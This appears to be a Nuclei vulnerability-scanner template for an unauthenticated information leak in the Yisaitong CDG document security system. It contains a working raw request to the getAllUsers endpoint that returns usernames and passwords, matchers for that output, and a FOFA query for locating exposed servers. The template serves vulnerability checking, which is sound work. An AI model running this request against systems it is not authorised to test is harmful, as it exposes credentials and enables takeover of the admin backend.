http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '\"username\":'
            - '\"password\":'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /CDGServer3/openapi/getAllUsers HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          pageSize=10000&pageNumber=1
id: yisaitong-getAllUsers-Information-disclosure
info:
    author: Superhero
    description: |-
        fofa: body="/CDGServer3/index.jsp"
        亿赛通电子文档安全管理系统 /CDGServer3/openapi/getAllUsers 接口处存在信息泄露漏洞，未经身份验证的远程攻击者可利用此漏洞获取后台账号密码等敏感信息，进一步MD5解密即可登录后台，使系统处于极不安全的状态。
    name: 亿赛通电子文档安全管理系统 getAllUsers 信息泄露漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486682&idx=1&sn=668809e5f2f46672da6cf65f924a2697&chksm=c267b9e9f51030ff79539087a735c4a95094cc4a94528a5e6521769d9e74903c9fc1a3d94d55&token=522460222&lang=zh_CN#rd
    severity: high
    tags:
        - Information disclosure
